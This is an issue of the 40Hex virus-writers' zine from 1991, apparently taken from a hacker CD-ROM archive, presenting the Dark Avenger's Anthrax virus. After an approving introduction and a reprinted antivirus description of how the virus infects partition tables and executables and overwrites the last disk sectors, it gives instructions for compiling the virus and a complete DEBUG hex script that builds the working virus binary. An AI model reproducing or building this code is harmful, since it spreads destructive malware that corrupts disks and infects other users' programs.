home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / 40hex-3.arj / 40HEX-3.003 < prev    next >
Encoding:
Text File  |  1991-10-27  |  9.1 KB  |  188 lines
  1.  40Hex Issue 3                                                      0003
  2.  
  3.                                 Anthrax
  4.  
  5.     Well, this is turning out to be a tribute issue to the Dark
  6.     Avenger.  Here is another one of his better known viruses.  This is
  7.     a nice one cause it not only is a file infector, but it is also a
  8.     sort of boot sector virus.  It is also what I dubbed a reincarnation
  9.     virus, meaning that even if you clean your system of it, it may
  10.     still live, because it leaves a copy of itself on the last sector of
  11.     the disk.  The virus can be reincarnated by the V2100 virus, also bu
  12.     The Dark Avenger.
  13.  
  14.     Well, Patti Hoffman (one of my favorite people on earth, not) wrote
  15.     this virus up.
  16.  
  17.  Aliases:
  18.  V Status:    Rare [Not for long]
  19.  Discovery:   July, 1990
  20.  Symptoms:    .COM & .EXE growth
  21.  Origin:      Bulgaria
  22.  Isolated:    Netherlands
  23.  Eff Length:  1040 - 1279 Bytes
  24.  Type Code:   PRAKX - Parasitic Resident .COM, .EXE, & Partition Table Infector
  25.  Detection Method:  ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+
  26.  Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+
  27.  General Comments:
  28.        The Anthrax Virus was isolated in July 1990 in the Netherlands after
  29.        it was uploaded onto several BBSes in a trojan anti-viral program,
  30.        USCAN.ZIP.  It is the second virus to be found in a copy of UScan
  31.        during July 1990, the first virus being V2100.  Anthrax is a memory
  32.        resident generic infector of .COM and .EXE files, including
  33.        COMMAND.COM.
  34.  
  35.        The first time a program infected with the Anthrax virus is executed
  36.        on the system's hard disk, the virus will infect the hard disk's
  37.        partition table.  At this point, the virus is not memory resident.  It
  38.        will also write a copy of itself on the last few sectors of the
  39.        system's hard disk.  If data existed on those last few sectors of the
  40.        hard disk, it will be destroyed.
  41.  
  42.        When the system is booted from the hard disk, the Anthrax virus
  43.        will install itself memory resident.  It will remain memory resident
  44.        until the first program is executed.  At that time, it will deinstall
  45.        itself from being resident and infect one .COM or .EXE file.  This
  46.        virus does not infect files in the current directory first, but
  47.        instead starts to infect files at the lowest level of the disk's
  48.        directory tree.
  49.  
  50.        Later, when an infected program is executed, Anthrax will infect one
  51.        .COM or .EXE file, searching the directory structure from the lowest
  52.        level of the directory tree.  If the executed infected program
  53.        was located on the floppy drive, a .COM or .EXE file may or may not
  54.        be infected.
  55.  
  56.        The Anthrax Virus's code is 1,024 bytes long, but infected programs
  57.        will increase in length by 1,040 to 1,279 bytes.  On the author's test
  58.        system, the largest increase in length experienced was 1,232 bytes.
  59.        Infected files will always have an infected file length that is a
  60.        multiple of 16.
  61.  
  62.        The following text strings can be found in files infected with the
  63.        Anthrax virus:
  64.  
  65.                "(c)Damage, Inc."
  66.                "ANTHRAX"
  67.  
  68.        A third text string occurs in the viral code, but it is in Cyrillics.
  69.        Per Vesselin Bontchev, this third string translates to: "Sofia 1990".
  70.  
  71.        Since Anthrax infects the hard disk partition tables, infected systems
  72.        must have the partition table disinfected or rebuilt in order to
  73.        remove the virus.  This disinfection can be done with either a low-
  74.        level format or use of the MDisk/P program for the correct DOS
  75.        version after powering off and rebooting from a write-protected boot
  76.        diskette for the system.  Any .COM or .EXE files infected with
  77.        Anthrax must also be disinfected or erased.  Since a copy of the virus
  78.        will exist on the last few sectors of the drive, these must also be
  79.        located and overwritten.
  80.  
  81.        Anthrax interacts with another virus: V2100.  If a system which was
  82.        previously infected with Anthrax should become infected with the V2100
  83.        virus, the V2100 virus will check the last few sectors of the hard
  84.        disk for the spare copy of Anthrax.  If the spare copy is found, then
  85.        Anthrax will be copied to the hard disk's partition table.
  86.  
  87.        It is not known if Anthrax carries any destructive capabilities or
  88.        trigger/activation dates.
  89.  
  90.  
  91.  
  92.  
  93.        Here is the actual virus.  Well if this is your fist copy of
  94.        40Hex, let me explain how to compile it.
  95.  
  96.        First copy what is below with your editor.  Then save it to a file
  97.        called ANTHRAX.SCR.  Then type at the command line -
  98.  
  99.        DEBUG <ANTHRAX.SCR
  100.  
  101.        This will create a file called ANTHRAX.COM, that's the actual virus.
  102.  
  103. -------------------------------------------------------------------------------
  104.  
  105. n anthrax.com
  106. e 0100  E9 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00
  107. e 0110  95 8C C8 2D 00 00 BA 00 00 50 52 1E 33 C9 8E D9
  108. e 0120  BE 4C 00 B8 CD 00 8C CA 87 44 44 87 54 46 52 50
  109. e 0130  C4 1C B4 13 CD 2F 06 53 B4 13 CD 2F 58 5A 87 04
  110. e 0140  87 54 02 52 50 51 56 A0 3F 04 A8 0F 75 6C 0E 07
  111. e 0150  BA 80 00 B1 03 BB 77 06 B8 01 02 50 CD 13 58 B1
  112. e 0160  01 BB 00 04 CD 13 0E 1F BE 9B 03 8B FB B9 5E 00
  113. e 0170  56 F3 A6 5E 8B FB B9 62 00 56 F3 A4 5F BE 12 08
  114. e 0180  B9 65 00 F3 A4 74 1E 89 4D E9 B1 5C 89 4D 9B 88
  115. e 0190  6D DC B1 02 33 DB B8 02 03 CD 13 49 BB 00 04 B8
  116. e 01A0  01 03 CD 13 49 B4 19 CD 21 50 B2 02 B4 0E CD 21
  117. e 01B0  B7 02 E8 87 01 5A B4 0E CD 21 5E 1F 8F 04 8F 44
  118. e 01C0  02 8F 44 44 8F 44 46 1F 1E 07 95 CB 28 63 29 20
  119. e 01D0  44 61 6D 61 67 65 2C 20 49 6E 63 2E 00 B0 03 CF
  120. e 01E0  06 1E 57 56 50 33 C0 8E D8 BE 86 00 0E 07 BF 08
  121. e 01F0  06 FD AD AB A5 AF 87 F7 AD FC 74 11 1E 07 AF B8
  122. e 0200  07 01 AB 8C C8 AB 8E D8 BF 68 00 A5 A5 58 5E 5F
  123. e 0210  1F 07 2E FF 2E 00 06 06 1E 57 56 52 51 53 50 0E
  124. e 0220  1F BE 06 06 33 C9 8E C1 BF 84 00 A5 A5 B4 52 CD
  125. e 0230  21 26 8B 47 FE 8E D8 BB 03 00 03 07 40 8E D8 81
  126. e 0240  07 80 00 0E 07 B7 12 E8 F2 00 58 5B 59 5A 5E 5F
  127. e 0250  1F 07 2E FF 2E 06 06 C3 91 AE B4 A8 BF 20 31 39
  128. e 0260  39 30 B8 00 3D CD 21 72 EE 93 B8 20 12 CD 2F 53
  129. e 0270  26 8A 1D B8 16 12 CD 2F 5B BE 62 04 8B D6 B1 18
  130. e 0280  B4 3F CD 21 33 C1 75 70 06 1F C6 45 02 02 33 D2
  131. e 0290  EC 3C 10 72 FB 03 45 11 13 55 13 24 F0 3D 00 FB
  132. e 02A0  73 56 89 45 15 89 55 17 0E 1F 50 B1 10 F7 F1 2B
  133. e 02B0  44 08 8B C8 2B 44 16 A3 04 00 AD 35 4D 5A 74 03
  134. e 02C0  35 17 17 9C 75 17 89 04 3B 44 0A 87 44 12 A3 07
  135. e 02D0  00 89 4C 14 B9 DC 04 74 07 83 44 08 48 B9 65 00
  136. e 02E0  51 B9 9B 03 B4 40 CD 21 33 C8 59 75 09 BA 00 04
  137. e 02F0  B4 40 CD 21 33 C8 5A 58 75 38 26 89 4D 15 26 89
  138. e 0300  4D 17 52 9D 75 18 26 8B 45 11 26 8B 55 13 B5 02
  139. e 0310  F7 F1 85 D2 74 01 40 89 14 89 44 02 EB 0A C6 44
  140. e 0320  FE E9 05 28 03 89 44 FF B9 18 00 8D 54 FE B4 40
  141. e 0330  CD 21 26 80 4D 06 40 B4 3E CD 21 C3 8E D9 8A 1E
  142. e 0340  6C 04 0E 1F FF 06 5E 04 BA 4B 06 E8 1F 00 BE 0A
  143. e 0350  06 C6 04 5C 46 32 D2 B4 47 CD 21 BA 9B 03 B4 3B
  144. e 0360  CD 21 E3 0D B4 51 CD 21 8E DB BA 80 00 B4 1A EB
  145. e 0370  C8 72 3E BE 9C 03 32 D2 B4 47 CD 21 3A 2E DC 03
  146. e 0380  B1 32 BA 9D 02 B4 4E 74 5C CD 21 72 24 BA 4B 06
  147. e 0390  B8 01 4F BE DC 03 BF 68 06 AA B1 0D F3 A6 74 45
  148. e 03A0  3A 6D FE 74 40 CD 21 73 E4 32 C0 EB D3 2A 2E 2A
  149. e 03B0  00 B1 41 BF 9C 03 3A 2D 8A C5 A2 DC 03 74 69 F2
  150. e 03C0  AE 4F B1 41 B0 5C FD F2 AE 8D 75 02 BF DC 03 FC
  151. e 03D0  AC 84 C0 AA 75 FA BA CD 02 32 C9 EB 81 2E 2E 00
  152. e 03E0  BA 4B 06 B4 4F CD 21 72 C8 BE 69 06 BF DC 03 80
  153. e 03F0  3C 2E 74 EC 88 2D 8B D6 F6 44 F7 10 75 DB AC 84
  154. e 0400  C0 AA 75 FA 4E FD AD AD FC 3D 58 45 74 05 3D 4F
  155. e 0410  4D 75 CD 53 E8 4B FE 5B 33 C9 8E C1 26 A0 6C 04
  156. e 0420  0E 07 2A C3 3A C7 72 B8 BA 80 00 B1 03 BB 00 02
  157. e 0430  B8 01 03 CD 13 BA 0A 06 E9 23 FF 95 BF 00 01 8B
  158. e 0440  5D 01 81 EB 28 02 8B C7 8D B7 FD 03 A5 A4 93 B1
  159. e 0450  04 D3 E8 8C D9 03 C1 BA 0B 00 EB 71 B8 D0 00 FC
  160. e 0460  87 85 68 FA AB 8C C8 E2 F7 A3 86 00 AB 8E D8 B4
  161. e 0470  08 CD 13 49 49 A1 E9 03 84 E4 74 01 91 B2 80 B8
  162. e 0480  03 03 CD 13 91 84 E4 75 02 2C 40 FE CC A3 E9 03
  163. e 0490  FF 06 60 04 32 F6 B9 01 00 BB 00 04 B8 01 03 CD
  164. e 04A0  13 8A D6 CB 41 4E 54 48 52 41 58 0E 1F 83 2E 13
  165. e 04B0  04 02 CD 12 B1 06 D3 E0 8E C0 BF 00 04 BE 00 7C
  166. e 04C0  B9 00 01 8B DE FC F3 A5 8E D8 BA 27 04 51 53 50
  167. e 04D0  52 CB 8E C1 B1 04 BE B0 05 83 C6 0E AD 3C 80 74
  168. e 04E0  04 E2 F6 CD 18 92 FD AD 91 B8 01 02 CD 13 81 3E
  169. e 04F0  FE 05 55 AA 75 ED 06 1E 07 1F 32 F6 B9 02 00 33
  170. e 0500  DB B8 02 02 CD 13 E9 EE FE 00 00 00 00 CD 20 CC
  171. e 0510  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
  172. e 0520  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
  173. e 0530  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
  174. e 0540  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
  175. e 0550  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
  176. e 0560  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
  177. e 0570  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
  178.  
  179. rcx
  180. 480
  181. w
  182. q
  183.  
  184. -------------------------------------------------------------------------------
  185.                                                                      HR
  186.  
  187.  
  188.